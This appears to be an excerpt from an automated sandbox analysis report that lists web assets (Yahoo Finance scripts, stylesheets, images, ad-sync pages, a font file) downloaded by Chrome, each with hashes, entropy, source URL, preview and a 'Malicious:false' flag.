                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style license found at. * http://polymer.github.io/LICENSE.txt. * The complete set of authors may be found at. * http://polymer.github.io/AUTHORS.txt. * The complete set of contributors may be found at. * http://polymer.github.io/CONTRIBUTORS.txt. * Code distributed by Google as part of the polymer project is also. * subject to an additional IP rights grant found at. * http://polymer.github.io/PATENTS.txt. */.String(Math.random()).slice(2),./**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style license found at. * http://polymer.github.io/LICENSE.txt. * The complete set of authors may be found at. * http://polymer.github.io/AUTHORS.txt. * The complete set of contributors may be found at. * http://polymer.github.io/CONTRIBUTORS.txt. * Code distributed by Google as part of the
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.443521092018897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:J3Tm9YpNNMwIYhzGRyEqa5W9EXeHvjMJNI3vog+oJNI3vomv:3jTJ1ZERWGyTvWXvh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0927D595412EAD9D30D2449BE629A52D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:38F505E814041B66E2008FFFED982B777E736776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5DC70E266910978DB8D80CA5A612D7770291FE4ACEF40AA863D52CEF6A5DF4A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B778E3573113D19A1F38F5A494ED56453B27ACCBEF44DDD38ECE9FC281B6B16032BD4F59F1737244AC0CB26648CD802B42DCB19E63F389ADD6F62870C3156BC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Image.BjjiB67D.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:img.yf-13q9uv1{border-radius:var(--border-radius);aspect-ratio:var(--aspect-ratio);-o-object-fit:var(--object-fit);object-fit:var(--object-fit)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):54272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.97718460281768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:iVCqo+ebJpEJIjDFi9HaTqDysnyUdK7W68pf:nq1UTsINiQoDJd/Bf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:43F6868A36B09C70E65EF6BBA6081292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9C3B418E0B81684A7CD481F60707B6D855D8396C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A0744383D85A047F0A965A10726561E188B267D795CF7223874A0D57FFA069F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:383B13FC84483DCA885A670B3C79A3C4E9C00CED80CA21E56355CE642415A49FE4992545E41DF35D5E48F381A035269949EBCC046637B54D1A49A78642EA60B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C......................................................................................................................T.........................!..1A."Qa.2q.....#BR...$..3b.r...%Cs...&5FSV......cdu.............................................................!1A...Q..2B."#R3aq$.............?.. ....hL..1.}.....!R.2K.\.!P...M8CG.$.k`9`z..2..on.x.....{m.18`-..:V...\..../j.c.-|FU7...JPU..Px.A...8..4..4..m"...H7-f.!...e]\.H.|#..sT.....".2..MFH+.....'.Y......C1..e.~.x......\....l..q5.E..`...f.dB..Ir.0.L..q..y.I..ROQAP.4.M$.B..Yb*Y.Y....2...T.a.*..0..*..S......;E")...7..........J.....3....i....bI8.-.....c.T..YKMP.r..G4.iV.#H!...I.....M?Rh..<8....T4.....L.2^Y.,..(..."....`;4.. x.......U..f...E.D@]E..Q.O].Q....je../ej........G...F...a...F...GU?lgY.~.x.....2..1...Z.i.L.r.Hb..i...v...1..k..O...'.J-.U.T..gw2.gK....Tv..r3.......(.....=..mu.\.:.*8.....-v;..E....s<.........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16111)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.272168851000061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:TFcFsc1FscPFschsibwBzwXyL3fseV3Lkz58K:T+TbwNlLpx25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A857CE7356B2ECB1A2184FF8BBB1545E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA9C9E26424E19CAE7AE4A7F389BB1E33A5C7443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:86024C041E1C00572DC75BF3C28CABDCEFC32B9B81C22A1123FDFE94C73090A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA96A3AB3B5AAE70C9735FA592B2FF3CEF7C1A2609DC0B09C86C7EC131F7BC04E82DF55AD993ACA5F68DFF4E4A9E80E33D34B9FCA4129FDD8434574081F7410E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/quoteUtil.DBZgD1yl.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a as n,t as m,f as u,b as T,N as A,c as R}from"./commonUtil.CI22_Irn.js";import{p as N}from"./43.CtYdpA_T.js";import{l as C}from"./loadQuoteType.mGEeGxqN.js";import{e as g}from"./index.g5YcAAdQ.js";const H=/[a-zA-Z0-9^.$_+=*&:@~-]+/g,l={POST:"POST",PRE:"PRE",REGULAR:"REGULAR"},L=["__quoteLeaf","__companyInsights","__quoteleaf"],F=["/valute/convertitore","/divisas/conversor","/devises/convertisseur","/waehrungen/waehrungsrechner","/finanzas-personales/conversor-divisas"],G={CLOSED:l.POST,POST:l.POST,POSTPOST:l.POST,PRE:l.PRE,PREPRE:l.POST,REGULAR:l.REGULAR},B=new Set(["analyst-ratings","analysis","balance-sheet","cash-flow","community","components","history","financials","futures","holders","holdings","insider-roster","insider-transactions","key-statistics","latest-news","news","options","performance","press-releases","profile","purchase-info","risk","sec-filing","summary","sustainability","chart"]),K=["price","summaryDetail","pageViews","financialsTemplate"],Y={MONEYMARKET:"pf-b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.039572593136675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHpWyepGpTuSypKcwH8KFAdSbF3:H69mc4sl3O4pTi3JO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B24E5028CE6AA93D50F366887C1BB3AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:221E24AA9FAA4A7511CBC6EA701DED627E40F88E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BEAD6056FFC1C60BFA669E524A4B45998A3443192279B1C664FF1C3DF7FB9E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:00438EF05FAC3D5349A3CB9017C2877380CA95BBA780BFE23D977FCDFB651BDA8F20048B45357B1978C67915304CCE2A556DE614973FD7E717AC3AE236A39938
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_left.CltsmSmq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.41 7.41 14 6l-6 6 6 6 1.41-1.41L10.83 12z"/></svg>';export{s as L};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.792343790108531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qvRS+vfqqgdzZgqnstf5BVcedxDtBwsO23crBZrFRDwE5kIuhcYsj:qDhgdz1stxbNxDkbPDwEchAj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:856BFDB63DC0D6FAD6B92FC6A29719E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FED2E3409CE1BBBFB37F6DA4ABEECC30CEFC021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEBE29898B8B7DE5C9E47DAAB474152BE8095E3AB42D768B84B085C5A12B95C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A61C0A108D63C89AE62A2B03108480B5C08BDA0E80049089A2A84CD7973BD9E94DCD2902E166B92E1D7AD5B7356357C9B181CB1B6051DD25913E82D2420154F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/1027.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiql{l...................................................................d......................................................................................................................................................................................................./00......455566.......122.........-........233......|}}...011.....................{|}......788...$%%.........|}~'((................//344+,,.........z{|)**"##~..}~.*++677................................................=>>...!!!......#$$]^^&''CDDEFF...................SUU......lmn...........KLL...wxy...tvv...xyz.......................dee...............Z\\...fhh.................556...nppikk...ABB'''.........QRS`bbGII...?AA###......WYY............LMN:;;......NNN......VWXqss...bcc......a...[tRNS.......................)....^.b..a....w.....(A?..k...,....mm.......x(w...].....k.].........1....IDATX.Ww\.g....w.Q.@..n.W[E....?.1.%..."Y..i .e..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (6122)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.623368673011989
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:1Z43kxmJXYlfDqnGXos522H3uklSPypu4iuNmRNPyM2bQF+B6gL9pUbMrTiHHS:fmJEfsUoC5H3HlSyquNmRNKVLcYpU7y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C6EE3CA4AA758FCD191C5D0929AB1424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DB5057DCFE7B01FBEA2815DAB6029548CCD2B1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08B767BF7E55874E83A2EBFAA12AC4452009DF384CC7747C5E678C6D49CF0E9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AC7C2670149165647C6FA99A3516BF7E31BF06D995BFAA2C9BAFF9F18A63F9F863DA9F1BD6108202A30CD9743CAD5C9C4CEB9E08315221F3AF721D11A647A8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/DataTablePagination.D9SvUQqJ.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Z,e as B,t as $,b as N,d as D,f as L,h as j,j as T,i as E,q as R,k as H,l as P,m as Y,p as J,x}from"./scheduler.Dr9AAxFe.js";import{S as tt,i as et,c as O,b as G,m as z,t as I,a as M,d as V,g as nt,e as at}from"./index.DCSmZEjO.js";import{e as K}from"./each.BExQfwb4.js";import{t as k}from"./commonUtil.CI22_Irn.js";import{S as ot,O as st}from"./Select.N-a6-Z3E.js";import{A as it}from"./keyboard_arrow_right.Be_AUpuz.js";import{B as F}from"./Button.DpT5MMuf.js";const lt='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18.41 16.59 13.82 12l4.59-4.59L17 6l-6 6 6 6zM6 6h2v12H6z"/></svg>',rt='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M5.59 7.41 10.18 12l-4.59 4.59L7 18l6-6-6-6zM16 6h2v12h-2z"/></svg>',ft='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.41 16.59 10.83 12l4.58-4.59L14 6l-6 6 6 6z"/></svg>';function Q(s,o,e){const n=s.slice();return n[15]=o[e],n}function ct(s){let o=s[15]+"",e;return{c(){e=$(o)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?kdntuid=1&p=133799&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 240 x 34, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.732123200569469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:HCPVHbdLb/levTWdqgmGYDQpuYpdKqLxoh5F:HCNHxL4O0QpXKqOt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D0E45188F6A8F2E8F2528E762FE55D33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:42A007181ABDADCC4C79D03D74B08F39DDDC5127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DEB2DC4C95EA5B692229713672E7AEAE32B3914BAFCD63F926116D6637BD1976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0FD2F174A63472217D8BC23DE69DCBCAA1A583DED45152430D1A5BA455F6B1F360815DB34B5C8F96DA7DAAE232DB52197775F7F50955F497D6B664EB93B58800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/yahoo_weather_web/accuweather-horizontal.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......".....V}.....{PLTE............................................................................................................................x.....(tRNS....!.k6...L........)....Y..D..q>.wdS_._.D...'IDATh..Y.0.M............!.^..z.....&.d.......,...@.....m.&x..l....M.-.k4....kZa.........Y..F....=I..jx.C..H..W......e....o.oO.|..D..?#.D.{~..own*...S.........7..K.....<...nA..~.8."q.@....C2...j...>..t}....(..M..@^....a..x..~J8.n{.G..b$..m_%.Y.........X.X)..Y.b.qk..].....`z...1=...vu..dj..7c').h....L..0.+e*BC...S.....jyzb.\.........3G1K..`..{Kl..{_%....F.....g....h.)n..F...-&...K....)6...hV.e.#3.N..O,.....~'..s....SZ..!.).0..u.....v.1.....<...F...O.O...@....Bk.j.8[.D.4Y.5...h.-..:dAIzn.)>...\..1.....s.#[.{.....}.+.3....T.w..F.#.aaa.....7.5..QR...Q*....].#..n....R..`,q...n..B:..4...=.w.../..fNN...<.P..j.U...D...c.T.(.R.X8..~el..>.h.]]5\....6.-...9#.$.:..a6..1.U..`L.4.%...v....+D.eN.znm....v...H..T....o...;)X.\..0...x..5}B..*.Q.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36217)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):36339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.280002178499624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:1wAIxQpg2rh5k1aifQlCaH5H7uDl0/YdfIjz21OhGVsF:J+Qth5wlaH5HiDlgvH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3CA393BCF81C28B3BDE45F0DCC5DACC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:66B44E3B7A11AD94132DBC83FDB3C991EAC6EF87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0AF74F7EAF34A66F9A70FD832AFBF75E237DC10A3BB9AB71C9F6B5F916B7E155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9CD5E64EADE9A0D8FEBC8F32A2E381A6F7F16D526293A5093629C84EBA4B62081F2C57856180ED6775497D5799E317788EE6A789F7BF52F7642C009A057540D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/**!. * Sortable 1.15.3. * @author.RubaXa <trash@rubaxa.org>. * @author.owenm <owen23355@gmail.com>. * @license MIT. */function le(o,t){var e=Object.keys(o);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(o);t&&(n=n.filter(function(i){return Object.getOwnPropertyDescriptor(o,i).enumerable})),e.push.apply(e,n)}return e}function z(o){for(var t=1;t<arguments.length;t++){var e=arguments[t]!=null?arguments[t]:{};t%2?le(Object(e),!0).forEach(function(n){Me(o,n,e[n])}):Object.getOwnPropertyDescriptors?Object.defineProperties(o,Object.getOwnPropertyDescriptors(e)):le(Object(e)).forEach(function(n){Object.defineProperty(o,n,Object.getOwnPropertyDescriptor(e,n))})}return o}function Mt(o){"@babel/helpers - typeof";return typeof Symbol=="function"&&typeof Symbol.iterator=="symbol"?Mt=function(t){return typeof t}:Mt=function(t){return t&&typeof Symbol=="function"&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},Mt(o)}function Me(o,t,e){return t in o?Object.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.910029242146149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:+5F6D10D5uDD9QyhFADDqOqDdApkDV4Ptv14tDpiDFV0DxRt4MqDx1qCkDBN9A0N:+5Fe105w9JhFKqOudA+Vyh14VpGFmx35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:67DDBCF3ADB78F6B680F80564CA544FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:16C13C4A1B36ECB8BEDC29C27701C6D7619329A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D159EC6C311C7058174F59C285532348DABF14B6E323BA519848AE2262C89E03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EFBB7D1BC76B8A56405C287A645003CC22B048D22D16415A9F2C7BDCFB164E290FD80ED766FF8A9E19E0A5443B46A9539757AD9DADFD0258938166A55761408A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/static/impl/css/GTAmerica_2024-03-27.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot');. src: local('GT America Condensed Black'), local('GTAmerica-CondensedBlack'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/GTAmerica-CondensedBlack.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/GTAmerica-CondensedBlack.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/GTAmerica-CondensedBlack.ttf') format('truetype');. font-weight: 900;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlackItalic.eot');. src: local('GT America Condensed Black Italic'), local('GTAmerica-CondensedBlackItalic'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072960&val=0lxl7vp3lck2t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12779)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.522986307274393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:jtquREsbt7npSqo7lqfsegJdlF//isjdNc10VIYUh2bJByAjRhNn:jFxLQPB//lBHjcQItolY2TN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:83ABB09B36CFFE0B6E2BC8DA0ABD92E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C05E4602E77B87E10FAE21350F7413CBDA21F60F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E8C219AE2CA88342CDAF758752219FD0C4D1F0C0FCDF00A5DE4AF1AF6C72B70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6BD18B87703AD9196AC3C6607DEAFC8E5E32CC8EC27ECFFFF69818846B23A23F809A738304CA7F97F3923F03E0D33560B2CEF3D22B94E5F12C4679FB93C20631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
